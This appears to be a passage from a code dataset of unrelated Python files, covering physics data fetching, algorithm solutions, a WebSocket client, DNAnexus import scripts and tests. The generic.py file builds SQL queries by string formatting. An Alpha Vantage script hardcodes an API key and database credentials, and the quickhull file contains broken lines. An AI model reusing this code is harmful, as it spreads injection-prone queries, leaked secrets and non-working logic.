return True\n\ntry:\n tray.AddModule(f,\"keywordfn\",\n bar = 'BARWASSET',\n argdoesntexist = 'oopsie')\n print(\"That should have thrown\")\n sys.exit(1)\n\nexcept RuntimeError as e:\n print(e)\n print(\"OK, threw as expected\")\n\n \n\n \n\n","sub_path":"icetray/resources/test/unknown_keywd_argument.py","file_name":"unknown_keywd_argument.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38747310","text":"import csv\nimport io\nimport urllib\nimport urllib.request\n\n\ndef fetch_states(atom):\n url = \"https://physics.nist.gov/cgi-bin/ASD/energy1.pl\"\n values = {\n \"spectrum\": atom,\n \"units\": 2, # energy units {0: cm^-1, 1: eV, 2: Ry}\n \"format\": 3, # format {0: HTML, 1: ASCII, 2: CSV, 3: TSV}\n \"multiplet_ordered\": 1, # energy ordred\n \"term_out\": \"on\", # output the term symbol string\n \"conf_out\": \"on\", # output the configutation string\n \"level_out\": \"on\", # output the energy level\n \"unc_out\": 0, # uncertainty on energy\n \"j_out\": \"on\", # output the J level\n \"g_out\": \"on\", # output the g-factor\n \"lande_out\": \"off\", # output experimentally measured g-factor\n }\n\n get_postfix = urllib.parse.urlencode(values)\n with urllib.request.urlopen(url + \"?\" + get_postfix) as response:\n response = response.read()\n\n data = csv.DictReader(\n io.StringIO(response.decode()), dialect=\"excel-tab\", restkey=\"None\"\n )\n\n return data\n\n\ndef fetch_transitions(atom):\n # the NIST url and GET options.\n url = \"http://physics.nist.gov/cgi-bin/ASD/lines1.pl\"\n values = {\n \"spectra\": atom,\n \"format\": 3, # format {0: HTML, 1: ASCII, 2: CSV, 3: TSV}\n \"en_unit\": 2, # energy units {0: cm^-1, 1: eV, 2: Ry}\n \"line_out\": 2, # only with {1: transition , 2: level classifications}\n \"show_av\": 5,\n \"allowed_out\": 1,\n \"forbid_out\": 1,\n \"enrg_out\": \"on\",\n }\n\n get_postfix = urllib.parse.urlencode(values)\n with urllib.request.urlopen(url + \"?\" + get_postfix) as response:\n # when there are no transitions ASD returns a texl/html page with the\n # error message \"No lines are available in ASD with the parameters selected\"\n # rather than the expected text/plain when using format=3\n if response.headers.get_content_type() != \"text/plain\":\n print(response.headers.get_content_type())\n return []\n\n response = response.read()\n\n data = csv.DictReader(io.StringIO(response.decode()), dialect=\"excel-tab\")\n data_with_transition_probabilities = [\n transition for transition in data if transition[\"Aki(s^-1)\"]\n ]\n\n return data_with_transition_probabilities\n","sub_path":"atomphys/data/nist.py","file_name":"nist.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473288116","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 30 2018\nTo run the codes in server, to use time python3 ....py\n\nThis code is for contatenate results by R scripts\n\n% previous:\nThis code use parallelling to run DP which cannot be conducted for a long sequence; results are stored in multiple\ntxts, and then the code later combines the txts into a single txt file.\n\n@author: hangwei\n\"\"\"\nimport os\nimport numpy as np\nimport scipy.io\n\nimport_data = scipy.io.loadmat('unordered_frame.mat')\nseries_data_full = import_data['unordered_frame']\nimport_bkps = scipy.io.loadmat('bkps_true.mat')\nbkps_true_full = import_bkps['bkps_true']\n\nresults_folder = './seg_results/'\nif not os.path.exists(results_folder):\n os.makedirs(results_folder)\n \nnow_ind = 1\n\nnumber_ind = np.shape(series_data_full)[0] # 99568 # full: 99568\nn_parallel_chunk = 5000\n\nseries_data = series_data_full[1:(number_ind+1), :]\nbkps_true = bkps_true_full[bkps_true_full < number_ind]\nbkps_true = np.append(bkps_true, (number_ind - 1)) # the last segment is the end of data\nn_bkps = len(bkps_true) - 1\n\nnow_methods = ['e_divisive', 'e_cp3o_delta', 'ks_cp3o_delta']\ndef combine_txts():\n results_list = []\n if number_ind > n_parallel_chunk: \n number_chunks = int((number_ind-number_ind % n_parallel_chunk)/n_parallel_chunk + 1)\n for now_file_ind in range(1, number_chunks+1):\n now_file_name = now_method+'_'+str(number_ind)+'_'+str(now_file_ind)+'.txt'\n print(now_file_name)\n now_data = np.loadtxt(results_folder+now_file_name, dtype='int')\n if now_file_ind < number_chunks-1: # need to remove the last ind\n # results_list.append(now_data[0:now_data.shape[0]-1], axis = 0)\n results_list = np.concatenate((results_list, now_data[0:now_data.shape[0]-1]), axis = 0)\n print(now_data[0:now_data.shape[0]-1])\n else: # keep all the data\n results_list = np.concatenate((results_list, now_data), axis = 0)\n print(now_data)\n print(results_list)\n np.savetxt(results_folder + now_method + '_'+ str(number_ind)+'.txt', results_list, fmt='%d')\n np.savetxt(results_folder + now_method + '_'+ str(number_ind)+'.txt', results_list, fmt='%d')\n\nfor now_method in now_methods:\n combine_txts()\n\n\n\n\n\n","sub_path":"code/skoda/2_combine_results_for_parallel.py","file_name":"2_combine_results_for_parallel.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470903921","text":"from . import conn\n\n\ndef get_all_where(tablename, clause):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM {0} WHERE {1}\".format(tablename, clause))\n return cur\n\n\ndef get_all(tablename):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM {0}\".format(tablename))\n rows = cur.fetchall()\n\n return rows","sub_path":"app/models/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513976134","text":"#!/usr/bin/python3\n\"\"\"Module to add new attribute to an object if possible\"\"\"\n\n\ndef add_attribute(self, name, value):\n \"\"\"Add attrubute to object if possible\n Args:\n name: name of attribute\n value: value of attribute\n \"\"\"\n if hasattr(self, \"__dict__\"):\n setattr(self, name, value)\n else:\n raise TypeError(\"can't add new attribute\")\n","sub_path":"0x0A-python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129454644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 4 20:16:55 2019\r\n\r\n@author: gunjan\r\n\"\"\"\r\n#2-pointer approach works only for sorted array\r\n#input=[-1,0,1,2,-1,-4]\r\n#Expected output = [[-1, -1, 2], [-1, 0, 1]]\r\n\r\n###Two pointer approach\r\n\r\ndef solution(input):\r\n\r\n nums=sorted(input) #sorted array [-4,-1,-1,0,1,2]\r\n \r\n if(nums==[] or len(nums)<3):\r\n return 0\r\n \r\n answer=[]\r\n for i in range(len(nums)-2):\r\n #print nums[i]\r\n \r\n if((nums[i]==nums[i-1]) and i>0): # if 2 consecutive nos are same, same result will come-removes duplicates\r\n continue\r\n \r\n if(nums[i]>0): # if we reach a no greater than target - we can break the loop-wont find any more combinations\r\n break\r\n pt1=i+1 #low pointer\r\n pt2=len(nums)-1 #high pointer\r\n \r\n while(pt10): # sum>0 - decrease right pointer\r\n pt2-=1\r\n \r\n elif((nums[i]+nums[pt1]+nums[pt2])==0): # sum=0 - inc left and right pointer by 1\r\n answer.append([nums[i],nums[pt1],nums[pt2]])\r\n pt1+=1\r\n pt2-=1\r\n \r\n return answer\r\n\r\nsolution([-1,0,1,2,-1,-4])\r\n\r\n#Time Complexity=O(n^2) - for loop and while loop\r\n#Space Complexity=O(1)\r\n\r\n\r\n#other checks for duplicates\r\n#1. set(solution) #to remove duplicates\r\n#2. -1 in input \r\n\r\n\r\n#Brute force approach \r\n\r\ndef solution2(nums):\r\n if(nums==[] or len(nums)<3):\r\n return 0\r\n \r\n answer2=[]\r\n for i in range(len(nums)-2):\r\n for j in range(i+1,len(nums)-1):\r\n for k in range(j+1,len(nums)):\r\n sum=nums[i]+nums[j]+nums[k]\r\n if(sum==0):\r\n x=sorted([nums[i],nums[j],nums[k]])\r\n if x not in answer2:\r\n answer2.append(x)\r\n return answer2\r\nsolution2([-1,0,1,2,-1,-4])\r\n\r\n#Time Complexity=O(n^3) - for loop and while loop\r\n#Space Complexity=O(n^3)\r\n\r\n\r\n","sub_path":"Problem#34.py","file_name":"Problem#34.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"654245264","text":"from distutils.core import setup\n\nfrom setuptools import find_packages\n\n\ndef get_requirements():\n # https://stackoverflow.com/questions/32688688/how-to-write-setup-py-to-include-a-git-repo-as-a-dependency\n with open('requirements.txt') as r:\n requirements = r.read().splitlines()\n required = []\n\n # do not add to required lines pointing to git repositories\n egg_mark = '#egg='\n for line in requirements:\n if line.startswith('-e git:') or line.startswith('-e git+') or \\\n line.startswith('git:') or line.startswith('git+'):\n if egg_mark in line:\n package_name = line[line.find(egg_mark) + len(egg_mark):]\n required.append(package_name + ' @ ' + line)\n # imagededup @ git+ssh://git@github.com/philipperemy/imagededup.git@master#egg=imagededup\n else:\n print('Dependency to a git repository should have the format:')\n print('git+ssh://git@github.com/xxxxx/xxxxxx#egg=package_name')\n exit(1)\n else:\n required.append(line)\n return required\n\n\nsetup(\n name='craft_pytorch',\n version='1.0-skysense',\n packages=find_packages(),\n install_requires=get_requirements(),\n include_package_data=True,\n data_files=[\n ('craft_ic15_20k.pth', ['craft/craft_ic15_20k.pth']),\n ('craft_mlt_25k.pth', ['craft/craft_mlt_25k.pth']),\n ('craft_refiner_CTW1500.pth', ['craft/craft_refiner_CTW1500.pth'])\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17157832","text":"def quickhull(listPts):\r\n \"\"\"Returns the convex hull vertices computed using the\r\n Quickhull algorithm as a list of m tuples\r\n [(u0,v0), (u1,v1), ...]\r\n \"\"\"\r\n #Finding the minimum and mximum x points\r\n min_x = (float('inf'), 0)\r\n max_x = (0, 0)\r\n for point in listPts:\r\n if point[0] < min_x[0]: min_x = point\r\n if point[0] > max_x[0]: max_x = point\r\n #Clculating the convex hull using the quickhull_helper function\r\n chull = quickhull_helper(listPts, min_x, max_x)\r\n chull += quickhull_helper(listPts, max_x, min_x)\r\n #Returning the convex hull\r\n return chull\r\n\r\ndef quickhull_helper(listPts, min_x, max_x):\r\n \"\"\"\r\n Helper function for the quickhull algorithm,\r\n which performs the bulk of the algorithm and returns\r\n semi complete convex hulls\r\n \"\"\"\r\n #Getting all the points to the left of the line formed by the minimum and maximum x points\r\n left_points = [point for point in listPts if is_counter(min_x, max_x, point)]\r\n #Getting the farest left point\r\n far_point = farest_point(min_x, max_x, left_points)\r\n #Checking if there is no points to the left\r\n if far_point == (-1, -1): return [max_x]\r\n #Recursively getting the points of the convex hull\r\n hullPts = quickhull_helper(left_points, min_x, far_point)\r\n hullPts = hullPts + quickhull_helper(left_points, far_point, max_x)\r\n #Returning the hull points from the passed set of points\r\n return hullPts\r\n\r\ndef farest_point(A, B, listPts):\r\n \"\"\"\r\n Returns the point from a passed list which is\r\n the farest from the passed line AB\r\n \"\"\"\r\n #Setting up the minimum and maximum x points\r\n max_point = (-1, -1)\r\n max_distance = 0\r\n #Looping over all points\r\n for point in listPts:\r\n #Checking the current point isnt one of the bounding points\r\n if point not in [A, B]:\r\n #Calculating the distance from the bounding line to the point\r\n temp = abs((B[1] - A[1]) * point[0] - (B[0] - A[0]) * point[1] + B[0] * A[1] - B[s1] * A[0])\r\n distance = (temp) / (((B[1] - A[1])**2 + (B[0] - A[0]) ** 2) ** 0.5)\r\n #Checking if the current point is further away than the current furthest point\r\n if distance > max_distance:\r\n max_distance = distance\r\n max_point = point\r\n #Returning the furthest point\r\n return max_point(A[1] - X[1]) * (B[0] - X[0])\r\n\r\n\r\n\r\ndef is_counter(A, B, Y):\r\n \"\"\"Returns boolean flag holding if the turn\r\n of the three points passed is counter clockwise\r\n \"\"\"\r\n #Using the line function to check if the line forms a counter clock wise turn\r\n return (((B[0] - A[0])*(Y[1] - A[1]) -\r\n ((B[1] - A[1])*(Y[0] - A[0])))) > 0","sub_path":"quickhull.py","file_name":"quickhull.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"576393390","text":"#\n# Copyright 2017 CNIT - Consorzio Nazionale Interuniversitario per le Telecomunicazioni\n#\n# Licensed under the Apache License, Version 2.0 (the );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom parserClick import *\nfrom xml2py import *\nimport argparse\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom parserView import *\nfrom parserAllView import *\nfrom parserDetailView import *\n\n\n\ndef run_command(data,nx_topology):\n\t\n\tif args.type_view == 'View':\n\t\tparserView(args.file, nx_topology)\n\t\n\telif args.type_view == 'AllView':\n\t\tparserAllView(args.file, nx_topology)\n\telif args.type_view == 'DetailView':\n\t\tparserDetailView(args.file, nx_topology)\n\n\t#parse_click(args.file, nx_topology)\n\n\n\t#add_edge_nodes(nx_topology)\n\t#flow_allocator(args.controllerRestIp)\n\t#simulate_flow_allocator(nx_topology, args.file)\n\ndef parse_cmd_line():\n\tparser = argparse.ArgumentParser(description='')\n\tparser.add_argument('--f', dest='file', action='store', help='file click to parse')\n\tparser.add_argument('--show',dest='type_view', action='store', help='view type to dispay [View - AllView - DetailView]')\n\targs = parser.parse_args() \n\n\tif len(sys.argv)<2:\n\t\tparser.print_help()\n\t\tsys.exit(1) \n\t\n\tif args.type_view != 'View' and args.type_view != 'AllView' and args.type_view != 'DetailView':\n\t\tparser.print_help()\n\t\tsys.exit(1) \n\t\n\n\treturn args\n\n\t\n\t\nif __name__ == '__main__':\n\n\tnx_topology = nx.MultiDiGraph()\n\targs = parse_cmd_line()\n\trun_command(args,nx_topology)\n\tif len(nx_topology)!=0:\n\t\txml2py(nx_topology)\n\t\t#for node in nx_topology.nodes_iter(data = True):\n\t\t\t\t#print node[1]['element'] +' '+ node[1]['portcount'] +' '+ node[1]['flowcode'] +' '+node[1]['processing']\n\t\tnx.draw(nx_topology)\n\t\tplt.show() \n","sub_path":"code/lib/clickparser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319148982","text":"#!/usr/bin/env python3\n\n###\n#Nathaniel Watson\n#Stanford School of Medicine\n#Nov. 6, 2018\n#nathankw@stanford.edu\n###\n\n\"\"\"\nChecks DNAnexus for new sequencing result projects and imports metadata (i.e. number of reads) into\nPulsar by creating a SequencingRun object if necessary and one or more SequencingResult objects. \n\nSee wiki documentation in the pulsar_lims GitHub repo at https://github.com/nathankw/pulsar_lims/wiki/Importing-Sequencing-Results.\n\nIf the --log-s3 flag is set, then the log files will be uploaded to S3 in the bucket specified by the\nenvironment variable PULSARPYDX_S3. The log files will be stored in this bucket by timestamp.\n\"\"\"\n\nimport argparse\nimport datetime\nimport time\nimport logging\nimport os\n\nimport boto3\nimport dxpy\n\nimport pulsarpy.models\nimport pulsarpy.utils\nfrom pulsarpy.elasticsearch_utils import MultipleHitsException\nimport scgpm_seqresults_dnanexus.dnanexus_utils as du\nfrom pulsarpy_dx import logger, LOG_DIR\nimport pulsarpy_dx.utils as utils\n\n\n#The environment module gbsc/gbsc_dnanexus/current should also be loaded in order to log into DNAnexus\n\nENCODE_ORG = \"org-snyder_encode\"\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-d',\"--days-ago\",type=int,default=30, help=\"\"\"\n The number of days ago to query for new projects that are billed to {}.\"\"\".format(ENCODE_ORG)\n )\n parser.add_argument(\"--log-s3\", action=\"store_true\", help=\"\"\"\n Presence of this option means to upload the log files to the S3 bucket indicated by the\n environment variable PULSARPYDX_S3.\"\"\"\n )\n return parser\n\ndef main():\n parser = get_parser()\n args = parser.parse_args()\n log_s3 = args.log_s3\n days_ago = args.days_ago \n since_datetime = datetime.datetime.utcnow() - datetime.timedelta(days=days_ago)\n since_timestamp_milliseconds = int(since_datetime.timestamp() * 1000)\n \n projects = dxpy.api.org_find_projects(object_id=ENCODE_ORG, input_params={\"created\": {\"after\": since_timestamp_milliseconds}})\n projects = projects[\"results\"]\n # projects is a list of dicts (was a generator)\n num_projects = len(projects)\n logger.debug(\"Found {} projects.\".format(num_projects))\n if projects:\n for i in range(num_projects):\n logger.debug(\"{}. {}\".format(str(i + 1), projects[i][\"id\"]))\n else: \n return\n\n for i in projects:\n proj_id = i[\"id\"]\n print(proj_id)\n du.share_with_org(project_ids=[proj_id], org=ENCODE_ORG, access_level=\"CONTRIBUTE\")\n try:\n utils.import_dx_project(proj_id)\n except utils.MissingSequencingRequest:\n logger.error(\"No SequencingRequest for DNAnexus project {}.\".format(proj_id))\n except Exception as e:\n # Send email with error details to Admin\n body = \"Error importing sequencing results for DNAnexus project {}.\\n\\n\".format(proj_id)\n body += e.__class__.__name__ + \": \" + str(e)\n logger.error(body)\n form = {\n \"subject\": \"Error in import_seq_results.py\",\n \"text\": body,\n \"to\": pulsarpy.DEFAULT_TO,\n }\n res = pulsarpy.utils.send_mail(form=form, from_name=\"import_seq_results\")\n finally:\n if log_s3:\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(os.environ[\"PULSARPYDX_S3\"])\n # Add subfolder for the present day\n upload_folder = str(datetime.date.today()) + \"/\"\n bucket.put_object(Key=upload_folder) # put_object() is idempotent\n today_logs = os.path.join(LOG_DIR)\n for logfile in os.listdir(today_logs):\n filepath = os.path.join(today_logs, logfile)\n key = os.path.join(upload_folder, logfile)\n bucket.upload_file(Key=key, Filename=filepath) \n \n\n\ndef get_read_stats(barcode_stats, read_num):\n \"\"\"\n .. deprecated:: 0.1.0\n Read stats are now parsed from the output of Picard Tools's CollectAlignmentSummaryMetrics.\n Such files are also stored in the DNAnexus projects created by GSSC. \n\n Each barcoded library in a DNAnexus project from GSSC contains a ${barcode}_stats.json file, where ${barcode} is a \n barcode sequence, that has read-level stats. This function accepts a barcode-specific hash \n from that file and parses out some useful read-based stats for the given read number. \n An example of a barcode_stats.json file is provided in the data subdirectory of this script.\n\n Args:\n barcode_stats: `dict`. The JSON-loaded content of a particular ${barcode}_stats.json file. \n See `scgpm_seqresults_dnanexus.dnanexus_utils.DxSeqResults.get_barcode_stats()` for\n more details.\n read_num: `int`. The read number (1 or 2) for which you need read stats.\n \"\"\"\n read_num_key = \"Read {}\".format(read_num)\n read_hash = barcode_stats[read_num_key]\n stats = {}\n stats[\"pass_filter\"] = read_hash[\"Post-Filter Reads\"]\n return stats\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pulsarpy_dx/scripts/import_seq_results.py","file_name":"import_seq_results.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606063636","text":"from typing import List\n\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n M = len(grid) # rows\n N = len(grid[0]) # columns\n\n for y in range(M):\n for x in range(N):\n if x == 0 and y == 0:\n continue\n if x > 0 and y == 0:\n grid[0][x] += grid[0][x - 1]\n elif y > 0 and x == 0:\n grid[y][0] += grid[y - 1][0]\n else:\n grid[y][x] += min(grid[y][x - 1], grid[y - 1][x])\n\n return grid[-1][-1]","sub_path":"leetcode/p0064_minimum_path_sum/my_attempt2.py","file_name":"my_attempt2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547371551","text":"\"\"\"\nhttps://leetcode.com/problems/sort-list/\n\nDivide and conquer. Find the mid of the linked liked list, cut, then sort the two sublist then merge.\n\nTime complexity: O(NlogN)\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def sortList(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n\n pre, slow, fast = None, head, head\n while fast and fast.next:\n pre, slow = slow, slow.next\n fast = fast.next.next\n pre.next = None\n\n return self.merge(self.sortList(head), self.sortList(slow))\n\n def merge(self, h1, h2):\n dummy = ListNode(None)\n curr = dummy\n while h1 and h2:\n if h1.val < h2.val:\n curr.next = h1\n curr = curr.next\n h1 = h1.next\n else:\n curr.next = h2\n curr = curr.next\n h2 = h2.next\n\n curr.next = h1 or h2\n\n return dummy.next\n","sub_path":"0148_SortList.py","file_name":"0148_SortList.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649808349","text":"#!/Users/VK/anaconda/bin/python\n\n#import pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nimport datetime\nimport pymysql\nimport time\n\ndef getData(SYMBOL):\n rundate = datetime.datetime.now()\n date = rundate.date()\n\n ts = TimeSeries(key='DD1FH080AL5OJ6XF', output_format='pandas')\n data, meta_data = ts.get_intraday(symbol=SYMBOL, interval='1min', outputsize='full')\n csv_file = '/Users/VK/Desktop/UChicago/Capstone/data/MAY_3RD_WEEK/' + str(SYMBOL) + '.csv'\n print (csv_file)\n data.to_csv(csv_file)\n\nif __name__ == \"__main__\":\n\n #db = pymysql.connect(\"localhost\", \"root2\", \"root123!\", \"US_STOCK_DATA\")\n #cursor = db.cursor()\n\n #query = 'SELECT index_name FROM Indices'\n #cursor.execute(query)\n\n symbols = ['VIX','GSPC','SPY']\n\n for sym in symbols:\n indice = sym\n getData(indice)\n\n'''\n dow_query = \"\"\"\n SELECT Symbol from dow30 where Symbol like 'X%' order by Symbol\n \"\"\"\n cursor.execute(dow_query)\n\n time.sleep(30)\n for dow in cursor:\n symbol = dow[0]\n getData(symbol)\n time.sleep(30) # alpha vantage does not like bots querying 5 or more symbols under minute\n\n'''\n","sub_path":"bin/ETL/getDataFromAlphaVantage.py","file_name":"getDataFromAlphaVantage.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"591449257","text":"import struct\n\nimport uri\nimport handshake\nimport framing\nimport eventloop\nfrom MsgQueue import MsgQueue\n\n\nCONTROL_FRAMES = {0x8: 'Close', 0x9: 'Ping', 0xA: 'Pong'}\nDATA_FRAMES = {0x0: 'Fragment', 0x1: 'Text', 0x2: 'Binary'}\nSTATUS_CODES = {1000: 'Normal', 1001: 'Going away', 1002: 'Protocol error', 1003: 'Invalid data type received',\n 1005: 'No close reason provided', 1006: 'Connection closed unexpectedly',\n 1007: 'Non-UTF8 encoded data', 1008: '', 1009: 'Data too large', 1010: 'Wrong extension list',\n 1011: 'Unexpected', 1015: 'TLS handshake failed'}\n\n\nclass SocketStateError(RuntimeError):\n pass\n\n\nclass WebSocketClient:\n def __init__(self, ws_uri):\n if not isinstance(ws_uri, str):\n raise TypeError('Unsupported type for WebSocket URI. Must be a string.')\n self.ws_uri = uri.construct_ws_uri(ws_uri)\n self.key = handshake.generate_client_key()\n self.queue = MsgQueue(b'', wsclient=self)\n\n self._state = 'CLOSED' # CONNECTING, OPEN, CLOSING, CLOSED\n self._close_code = 1006\n self._close_reason = ''\n self.headers = {}\n\n self._wsock = None\n self._loop = eventloop.get_event_loop()\n\n self.ping_msg = b''\n\n def check_arg(self, arg):\n if isinstance(arg, str):\n arg = arg.encode()\n if not isinstance(arg, bytes):\n raise TypeError('Method requires a string or bytes type object')\n\n return arg\n\n async def _do_handshake(self):\n self.headers = handshake.create_opening_handshake(ws_uri=self.ws_uri, key=self.key)\n sock, resp_headers = await handshake.send_upgrade_request(ws_uri=self.ws_uri, headers=self.headers)\n\n if not handshake.validate_server_response(resp=resp_headers, original_key=self.key):\n raise ValueError('Invalid response from the server')\n return sock\n\n async def connect(self):\n if self._state != 'CLOSED':\n raise RuntimeError('You cannot use the same connection twice!')\n self._state = 'CONNECTING'\n self._wsock = await self._do_handshake()\n self._state = 'OPEN'\n\n async def _recv(self, buff_size=1024):\n if self._state not in ('OPEN', 'CLOSING'):\n raise RuntimeError('Trying to read from socket in {} state'.format(self._state))\n\n data = await self._loop.sock_recv(sock=self._wsock, buff_size=buff_size)\n if not data:\n raise RuntimeError('WebSocket closed unexpectedly')\n self.queue.extend(data)\n\n async def recv(self):\n if self._state != 'OPEN' and self._state != 'CLOSING':\n raise RuntimeError('Trying to read from socket in {} _state'.format(self._state))\n\n fin, opcode, payload = await framing.parse_message(data=self.queue, client=self)\n if opcode in CONTROL_FRAMES:\n self._handle_control_frame(fin=fin, opcode=CONTROL_FRAMES[opcode], payload=payload)\n elif opcode in DATA_FRAMES:\n if not fin:\n payload += await self.recv() # TODO: control frames may arrive between msgs\n return payload.decode() if opcode == 1 else payload\n else:\n self.close(code=1002, timeout=0)\n raise RuntimeError('Invalid opcode received')\n\n async def send(self, msg, max_chunk_size=512):\n msg = self.check_arg(msg)\n if self._state != 'OPEN':\n raise RuntimeError('Trying to write to socket in {} _state'.format(self._state))\n\n if len(msg) > max_chunk_size:\n msgs = [msg[i:i+max_chunk_size] for i in range(0, len(msg), max_chunk_size)]\n\n first_fragment = framing.compose_message(payload=msgs[0], mask=True, fin=False)\n middle_fragments = (framing.compose_message(payload=msg, mask=True, fin=False, opcode=0)\n for msg in msgs[1:-1])\n final_fragment = framing.compose_message(payload=msgs[-1], mask=True, fin=True, opcode=0)\n\n await self._loop.sock_send(sock=self._wsock, data=first_fragment)\n for frag in middle_fragments:\n await self._loop.sock_send(sock=self._wsock, data=frag)\n await self._loop.sock_send(sock=self._wsock, data=final_fragment)\n\n else:\n data = framing.compose_message(payload=msg, mask=True)\n await self._loop.sock_send(sock=self._wsock, data=data)\n\n async def _handle_control_frame(self, fin, opcode, payload):\n if not fin:\n raise RuntimeError('Invalid frame received')\n if opcode == 'Close':\n try:\n self._close_code = struct.unpack('!H', payload[:2])[0]\n except struct.error:\n self._close_code = 1005\n self._close_reason = payload[2:].decode()\n\n if self._state != 'CLOSING':\n await self._send_close_frame(code=1001)\n elif opcode == 'Ping':\n await self._pong(payload)\n elif opcode == 'Pong':\n if payload.encode() != self.ping_msg:\n raise RuntimeError('Invalid PONG received')\n self.ping_msg = b''\n\n async def ping(self, msg=b''):\n msg = self.check_arg(msg)\n if self._state != 'OPEN':\n raise RuntimeError('Trying to write to socket in {} _state'.format(self._state))\n if self.ping_msg == b'':\n self.ping_msg = msg\n await self._loop.sock_send(sock=self._wsock, data=framing.compose_message(payload=msg, opcode=0x9))\n\n async def _pong(self, msg=b''):\n if self._state != 'OPEN':\n raise RuntimeError('Trying to write to socket in {} _state'.format(self._state))\n await self._loop.sock_send(sock=self._wsock, data=framing.compose_message(payload=msg, opcode=0xA, mask=True))\n\n async def close(self, reason=b'', *, code=1000, timeout=30):\n reason = self.check_arg(reason)\n\n await self._send_close_frame(code=code, reason=reason)\n # TODO: wait Timeout sec\n if self._state != 'CLOSED':\n self._close_socket()\n\n async def _send_close_frame(self, code, reason=b''):\n self._state = 'CLOSING'\n payload = struct.pack('!H', code) + reason\n data = framing.compose_message(payload=payload, opcode=0x8, mask=True)\n await self._loop.sock_send(sock=self._wsock, data=data)\n self._wsock.shutdown(1) # 1 = SHUT_WR\n\n def _close_socket(self):\n self._wsock.close()\n self._state = 'CLOSED'\n\nif __name__ == '__main__':\n loop = eventloop.get_event_loop()\n c = WebSocketClient('ws://localhost:8765')\n loop.create_task(c.connect())\n loop.run_forever()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132111046","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport pytest\n\nimport mimesis\nfrom mimesis.data import CALLING_CODES, CONTINENT_CODES, COUNTRIES_ISO\n\nfrom . import _patterns as p\n\n\n@pytest.fixture\ndef _address():\n return mimesis.Address()\n\n\ndef test_str(address):\n assert re.match(p.STR_REGEX, str(address))\n\n\ndef test_street_number(_address):\n result = _address.street_number()\n assert re.match(r'[0-9]{1,5}$', result)\n\n\ndef test_latitude(_address):\n result = _address.latitude()\n assert isinstance(result, float)\n assert result <= 90\n assert result >= -90\n\n\ndef test_longitude(_address):\n result = _address.longitude()\n assert isinstance(result, float)\n assert result <= 180\n assert result >= -180\n\n\ndef test_coordinates(_address):\n result = _address.coordinates()\n assert isinstance(result, dict)\n\n latitude = result['latitude']\n assert isinstance(latitude, float)\n assert latitude <= 90\n assert latitude >= -90\n\n longitude = result['longitude']\n assert isinstance(latitude, float)\n assert longitude <= 180\n assert longitude >= -180\n\n\ndef test_street_name(address):\n result = address.street_name()\n assert isinstance(result, str)\n assert result in address.data['street']['name']\n\n\ndef test_street_suffix(address):\n result = address.street_suffix()\n assert isinstance(result, str)\n assert result in address.data['street']['suffix']\n\n\ndef test_address(address):\n result = address.address()\n assert isinstance(result, str)\n assert result is not None\n\n\ndef test_state(address):\n result = address.state()\n assert result in address.data['state']['name']\n\n result_abbr = address.state(abbr=True)\n assert result_abbr in address.data['state']['abbr']\n\n\ndef test_postal_code(address):\n result = address.postal_code()\n current_locale = address.locale\n\n if current_locale in p.POSTAL_CODE_REGEX:\n assert 